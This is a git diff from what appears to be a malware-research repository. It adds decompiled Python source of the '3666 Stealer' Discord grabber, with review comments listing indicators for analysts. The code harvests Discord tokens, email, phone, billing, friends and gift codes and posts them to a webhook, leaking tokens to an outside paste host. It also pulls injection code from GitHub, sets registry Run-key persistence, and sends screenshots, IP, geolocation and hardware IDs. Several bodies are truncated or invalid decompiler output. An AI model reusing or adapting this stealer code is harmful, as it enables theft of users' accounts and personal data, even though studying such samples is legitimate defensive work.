f'''https://cdn.discordapp.com/avatars/{user_id}/{user['avatar']}.gif''' if requests.get(f'''https://cdn.discordapp.com/avatars/{user_id}/{user['avatar']}.gif''').status_code == 200 else f'''https://cdn.discordapp.com/avatars/{user_id}/{user['avatar']}.png''' + badges = ' '.join((lambda .0: [ flag[0] for flag in .0 ])(self.calc_flags(user['public_flags']))) + if user['premium_type'] == 0: + nitro = 'None' + elif user['premium_type'] == 1: + nitro = 'Nitro Classic' + elif user['premium_type'] == 2: + nitro = 'Nitro' + elif user['premium_type'] == 3: + nitro = 'Nitro Basic' + else: + nitro = 'None' + if billing: + payment_methods = [] + for method in billing: + if method['type'] == 1: + payment_methods.append('\xf0\x9f\x92\xb3') + continue + if method['type'] == 2: + payment_methods.append('<:paypal:973417655627288666>') + continue + payment_methods.append('\xe2\x9d\x93') + payment_methods = ', '.join(payment_methods) + else: + payment_methods = None + if guilds: + hq_guilds = [] + for guild in guilds: + admin = True if guild['permissions'] == '4398046511103' else False + if admin and guild['approximate_member_count'] >= 100: + owner = '\xf0\x9f\x91\x91' if guild['owner'] else '\xe2\x9d\x8c' + invites = requests.get(f'''https://discord.com/api/v8/guilds/{guild['id']}/invites''', { + 'Authorization': token }, **('headers',)).json() + if len(invites) > 0: + invite = f'''https://discord.gg/{invites[0]['code']}''' + else: + invite = 'https://youtu.be/dQw4w9WgXcQ' + hq_guilds.append(f'''\xe2\x80\x8b\n**{guild['name']} ({guild['id']})** \n Owner: `{owner}` | Members: ` \xe2\x9a\xab {guild['approximate_member_count']} / \xf0\x9f\x9f\xa2 {guild['approximate_presence_count']} / \xf0\x9f\x94\xb4 {guild['approximate_member_count'] - guild['approximate_presence_count']} `\n[Join Server]({invite})''') + if len(hq_guilds) > 0: + hq_guilds = '\n'.join(hq_guilds) + else: + hq_guilds = None + else: + hq_guilds = None + if friends: + hq_friends = [] + for friend in friends: + 
unprefered_flags = [ + 64, + 128, + 256, + 1048704] + inds = (lambda .0: [ flag[1] for flag in .0 ])(self.calc_flags(friend['user']['public_flags'])[::-1]) + for flag in unprefered_flags: + inds.remove(flag) if flag in inds else None + if inds != []: + hq_badges = ' '.join((lambda .0: [ flag[0] for flag in .0 ])(self.calc_flags(friend['user']['public_flags'])[::-1])) + hq_friends.append(f'''{hq_badges} - `{friend['user']['username']}#{friend['user']['discriminator']} ({friend['user']['id']})`''') + if len(hq_friends) > 0: + hq_friends = '\n'.join(hq_friends) + else: + hq_friends = None + else: + hq_friends = None + if gift_codes: + codes = [] + for code in gift_codes: + name = code['promotion']['outbound_title'] + code = code['code'] + codes.append(f''':gift: `{name}`\n:ticket: `{code}`''') + if len(codes) > 0: + codes = '\n\n'.join(codes) + else: + codes = None + else: + codes = None + embed = Embed(f'''{username} ({user_id})''', 0, **('title', 'color')) + embed.set_thumbnail(avatar, **('url',)) + embed.add_field('<:bmoderator:1047945951152713798> Badges:', f'''{badges if badges != '' else 'None'}''', True, **('name', 'value', 'inline')) + embed.add_field('<:key1:1037772274188685322> MFA:', f'''`{mfa}`''', True, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field(' Nitro:', f'''`{nitro}`''', True, **('name', 'value', 'inline')) + embed.add_field(' Billing:', f'''`{payment_methods if payment_methods != '' else 'None'}`''', True, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field('<:token:1038576057206460436> Phone:', f'''`{phone if phone != None else 'None'}`''', True, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field('<:qlfBlanc:1028750908407951410> Email:', f'''`{email if email != None else 'None'}`''', True, 
**('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.add_field(' Token:', f'''`{token}`\n[Copie Token !](https://paste-pgpj.onrender.com/?p={token})\n\xe2\x80\x8b''', False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + if hq_guilds != None: + embed.add_field(' Permissions Server:', hq_guilds, False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + if hq_friends != None: + embed.add_field(' Big Friend:', hq_friends, False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + if codes != None: + embed.add_field(' Gift Codes:', codes, False, **('name', 'value', 'inline')) + embed.add_field('\xe2\x80\x8b', '\xe2\x80\x8b', False, **('name', 'value', 'inline')) + embed.set_footer('3666 Stealer', **('text',)) + self.webhook.send(embed, '3666 V1', 'https://cdn.discordapp.com/attachments/1040385802821185546/1041796452604719124/Picsart_22-11-14_07-42-50-867.png', **('embed', 'username', 'avatar_url')) + + diff --git a/Random/Dark Grabber/Annexes/injection.py b/Random/Dark Grabber/Annexes/injection.py new file mode 100755 index 0000000..ebb5c57 --- /dev/null +++ b/Random/Dark Grabber/Annexes/injection.py 
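Review bot: `upload_tokens.upload()` embeds each harvested token twice — in the `Token:` field and as a query parameter in a link to `https://paste-pgpj.onrender.com/?p={token}` — so beyond the webhook the tokens are also handed to a third-party host, which a reader of the hunk would miss without a comment. That host, the `discord.com/api/v6`/`v8`/`v9` `users/@me` endpoints called with an `Authorization` header, the footer string `3666 Stealer` and the `dQw4w9WgXcQ:` prefix in `regexp_enc` are the network and string indicators this file contributes and should be listed in a class docstring on `upload_tokens` and `extract_tokens`. The body of `extract_tokens.extract()` is missing (`Decompyle incomplete`) and `calc_flags()` contains `lambda .0 = None:`, which is not valid Python, so the listing cannot run as committed and should carry a header saying it is decompiled output. A short docstring on `upload_tokens` describing the account data the embed collects (email, phone, MFA status, billing methods, guilds, friends, gift codes) would also help anyone assessing the impact of this sample.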
@@ -0,0 +1,56 @@ +# Source Generated with Decompyle++ +# File: injection.pyc (Python 3.10) + +import os +import re +import subprocess +import psutil +import requests + +class Injection: + + def __init__(self = None, webhook = None): + self.appdata = os.getenv('LOCALAPPDATA') + self.discord_dirs = [ + self.appdata + '\\Discord', + self.appdata + '\\DiscordCanary', + self.appdata + '\\DiscordPTB', + self.appdata + '\\DiscordDevelopment'] + self.code = requests.get('https://github.com/GMB-ZKG/stealer-3666/blob/main/src/components/injection.py').text + for proc in psutil.process_iter(): + if 'discord' in proc.name().lower(): + proc.kill() + # WARNING: Decompyle incomplete + + + def get_core(self = None, dir = None): + for file in os.listdir(dir): + if re.search('app-+?', file): + modules = dir + '\\' + file + '\\modules' + if not os.path.exists(modules): + continue + for file in os.listdir(modules): + if re.search('discord_desktop_core-+?', file): + core = modules + '\\' + file + '\\' + 'discord_desktop_core' + if not os.path.exists(core + '\\index.js'): + continue + return (core, file) + return None + + + def start_discord(self = None, dir = None): + update = dir + '\\Update.exe' + executable = dir.split('\\')[-1] + '.exe' + for file in os.listdir(dir): + if re.search('app-+?', file): + app = dir + '\\' + file + if os.path.exists(app + '\\' + 'modules'): + for file in os.listdir(app): + if file == executable: + executable = app + '\\' + executable + subprocess.call([ + update, + '--processStart', + executable], True, subprocess.PIPE, subprocess.PIPE, **('shell', 'stdout', 'stderr')) + + diff --git a/Random/Dark Grabber/Annexes/startup.py b/Random/Dark Grabber/Annexes/startup.py new file mode 100755 index 0000000..48b54e8 --- /dev/null +++ b/Random/Dark Grabber/Annexes/startup.py 
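Review bot: `Injection.__init__` fetches `self.code` from a hard-coded GitHub URL (`https://github.com/GMB-ZKG/stealer-3666/...`) and then kills every process whose name contains `discord`, and `start_discord()` relaunches the client via `Update.exe --processStart`; neither the remote-fetch indicator nor the kill/relaunch sequence is documented. A class docstring naming that URL as an indicator and describing the observable behaviour (Discord processes terminated, then `Update.exe` spawned with `shell=True`, which on Windows presumably goes through `cmd.exe`) is what an analyst reading this file needs. The remainder of `__init__` is marked `Decompyle incomplete`, so what is done with the fetched `self.code` is not visible in this listing and should not be inferred from the file name.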
@@ -0,0 +1,58 @@ +# Source Generated with Decompyle++ +# File: startup.pyc (Python 3.10) + +import subprocess +import os +import shutil +import sys + +class Startup: + + def __init__(self = None): + self.working_dir = os.getenv('APPDATA') + '\\3666-stealer' + if self.check_self(): + return None + None.mkdir() + self.write_stub() + self.regedit() + + + def check_self(self = None): + if os.path.realpath(sys.executable) == self.working_dir + '\\dat.txt': + return True + + + def mkdir(self = None): + if not os.path.isdir(self.working_dir): + os.mkdir(self.working_dir) + return None + None.rmtree(self.working_dir) + os.mkdir(self.working_dir) + + + def write_stub(self = None): + shutil.copy2(os.path.realpath(sys.executable), self.working_dir + '\\dat.txt') + # WARNING: Decompyle incomplete + + + def regedit(self = None): + subprocess.run([ + 'reg', + 'delete', + 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', + '/v', + '3666-stealer', + '/f'], True, **('args', 'shell')) + subprocess.run([ + 'reg', + 'add', + 'HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run', + '/v', + '3666-stealer', + '/t', + 'REG_SZ', + '/d', + f'''{self.working_dir}\\run.bat''', + '/f'], True, **('args', 'shell')) + + diff --git a/Random/Dark Grabber/Annexes/systeminfo.py b/Random/Dark Grabber/Annexes/systeminfo.py new file mode 100755 index 0000000..166ca7e --- /dev/null +++ b/Random/Dark Grabber/Annexes/systeminfo.py 
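Review bot: `Startup.regedit()` establishes persistence through the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` value `3666-stealer`, pointing at `%APPDATA%\3666-stealer\run.bat`, while `write_stub()` copies the running executable to `dat.txt` in that directory; these registry and file paths are the persistence indicators this hunk contributes and are undocumented. Both `subprocess.run` calls pass `shell=True`, so on the host the sequence should appear as a shell spawning `reg delete` followed by `reg add` — worth stating in a docstring for detection engineers. `write_stub()` is marked `Decompyle incomplete`, so the listing never shows `run.bat` being written, and `mkdir()` contains the Decompyle++ artefact `None.rmtree(...)`; the file header should state that it is non-executable decompiled output.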
@@ -0,0 +1,117 @@
+# Source Generated with Decompyle++
+# File: systeminfo.pyc (Python 3.10)
+
+import ctypes
+import os
+import re
+import subprocess
+import uuid
+import psutil
+import requests
+import wmi
+from discord import Embed, File, SyncWebhook
+from PIL import ImageGrab
+import time
+
+class SystemInfo:
+
+ def __init__(self = None, webhook = None):
+ webhook = SyncWebhook.from_url(webhook)
+ embed = Embed('System Information', 0, **('title', 'color'))
+ embed.add_field(self.user_data()[0], self.user_data()[1], self.user_data()[2], **('name', 'value', 'inline'))
+ embed.add_field(self.system_data()[0], self.system_data()[1], self.system_data()[2], **('name', 'value', 'inline'))
+ embed.add_field(self.disk_data()[0], self.disk_data()[1], self.disk_data()[2], **('name', 'value', 'inline'))
+ embed.add_field(self.network_data()[0], self.network_data()[1], self.network_data()[2], **('name', 'value', 'inline'))
+ embed.add_field(self.wifi_data()[0], self.wifi_data()[1], self.wifi_data()[2], **('name', 'value', 'inline'))
+ image = ImageGrab.grab(None, False, True, None, **('bbox', 'include_layered_windows', 'all_screens', 'xdisplay'))
+ image.save('screenshot.png')
+ embed.set_image('attachment://screenshot.png', **('url',))
+
+ try:
+ webhook.send(embed, File('.\\screenshot.png', 'screenshot.png', **('filename',)), '3666 Info PC', 'https://cdn.discordapp.com/attachments/1040385802821185546/1041796452604719124/Picsart_22-11-14_07-42-50-867.png', **('embed', 'file', 'username', 'avatar_url'))
+ finally:
+ pass
+ if os.path.exists('screenshot.png'):
+ os.remove('screenshot.png')
+ return None
+ return None
+
+
+
+ def user_data(self = None):
+
+ def display_name():
+ GetUserNameEx = ctypes.windll.secur32.GetUserNameExW
+ NameDisplay = 3
+ size = ctypes.pointer(ctypes.c_ulong(0))
+ GetUserNameEx(NameDisplay, None, size)
+ nameBuffer = ctypes.create_unicode_buffer(size.contents.value)
+ GetUserNameEx(NameDisplay, nameBuffer, size)
+ return nameBuffer.value
+
+ display_name = display_name()
+ hostname = os.getenv('COMPUTERNAME')
+ username = os.getenv('USERNAME')
+ return (' User', f'''```Display Name: {display_name}\nHostname: {hostname}\nUsername: {username}```''', False)
+
+
+ def system_data(self = None):
+
+ def get_hwid():
+ hwid = subprocess.check_output('C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid', True, subprocess.PIPE, subprocess.PIPE, **('shell', 'stdin', 'stderr')).decode('utf-8').split('\n')[1].strip()
+ return hwid
+
+ cpu = wmi.WMI().Win32_Processor()[0].Name
+ gpu = wmi.WMI().Win32_VideoController()[0].Name
+ ram = round(float(wmi.WMI().Win32_OperatingSystem()[0].TotalVisibleMemorySize) / 1048576, 0)
+ hwid = get_hwid()
+ return ('<:ipa:1038595676084391999> System', f'''```CPU: {cpu}\nGPU: {gpu}\nRAM: {ram}\nHWID: {hwid}```''', False)
+
+
+ def disk_data(self = None):
+ disk = '{:<9} {:<9} {:<9} {:<9} '.format('Drive', 'Free', 'Total', 'Use%') + '\n'
+ for part in psutil.disk_partitions(False, **('all',)):
+ if os.name == 'nt':
+ if 'cdrom' in part.opts or part.fstype == '':
+ continue
+ usage = psutil.disk_usage(part.mountpoint)
+ disk += '{:<9} {:<9} {:<9} {:<9} '.format(part.device, str(usage.free // 1073741824) + 'GB', str(usage.total // 1073741824) + 'GB', str(usage.percent) + '%') + '\n'
+ return ('<:ipa:1038595676084391999> Disk', f'''```{disk}```''', False)
+
+
+ def network_data(self = None):
+
+ def geolocation(ip = None):
+ url = f'''http://ip-api.com/json/{ip}'''
+ response = requests.get(url, {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' }, **('headers',))
+ data = response.json()
+ return (data['country'], data['regionName'], data['city'], data['zip'], data['as'])
+
+
+ def proxy_check(ip = None):
+ url = f'''https://vpnapi.io/api/{ip}'''
+ response = requests.get(url, {
+ 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36' }, **('headers',))
+ data = response.json()
+ security = data['security']
+ (proxy, vpn, tor) = [
+ security['proxy'],
+ security['vpn'],
+ security['tor']]
+ if proxy and vpn or tor:
+ return True
+
+ ip = requests.get('https://api.ipify.org').text
+ mac = ':'.join(re.findall('..', '%012x' % uuid.getnode()))
+ (country, region, city, zip_, as_) = geolocation(ip)
+ proxy = proxy_check(ip)
+ return (':satellite: Network', '```IP Address: {ip}\nMAC Address: {mac}\nCountry: {country}\nRegion: {region}\nCity: {city} ({zip_})\nISP: {as_}\nVPN/Proxy/Tor: {proxy}```'.format(ip, mac, country, region, city, zip_, as_, proxy, **('ip', 'mac', 'country', 'region', 'city', 'zip_', 'as_', 'proxy')), False)
+
+
+ def wifi_data(self = None):
+ networks = []
+ out = ''
+ # WARNING: Decompyle incomplete
+
+
diff --git a/Random/Dark Grabber/writeup.md b/Random/Dark Grabber/writeup.md
index c45522f..3c074bc 100755
--- a/Random/Dark Grabber/writeup.md
+++ b/Random/Dark Grabber/writeup.md
@@ -26,7 +26,9 @@ On extrait les fichiers : * startup.py * systeminfo.py -C'est un grabber python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord. +Les fichiers sont dans [l'annexe.](https://github.com/ALittlePatate/Malware-Research/tree/master/Random/Dark%20Grabber/Annexe) + +C'est un stealer python classique, il récupère les mots de passe des navigateurs, les cookies, les tokens discord et il s'injecte dans discord. La config : ```Python
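Review bot: The control flow shown in `__init__` is not trustworthy as written — `try: webhook.send(...) finally: pass` is a decompiler rendering that hides whatever handler the original had, the block is followed by two consecutive `return None` statements, and `wifi_data` stops at `# WARNING: Decompyle incomplete` even though `__init__` indexes its result three times — so a note at the top of the annex should say the listing is decompiler output with truncated bodies. For the writeup's indicator section, every external endpoint this class contacts is visible here and worth listing: `https://api.ipify.org`, `http://ip-api.com/json/{ip}`, `https://vpnapi.io/api/{ip}`, the hard-coded avatar image on `cdn.discordapp.com`, and the Discord webhook URL passed in, all sent with the spoofed Chrome 91 User-Agent string. The host-side artifacts are the transient `screenshot.png` written to the process's working directory and then removed, and the `WMIC.exe csproduct get uuid` child process spawned from `get_hwid`.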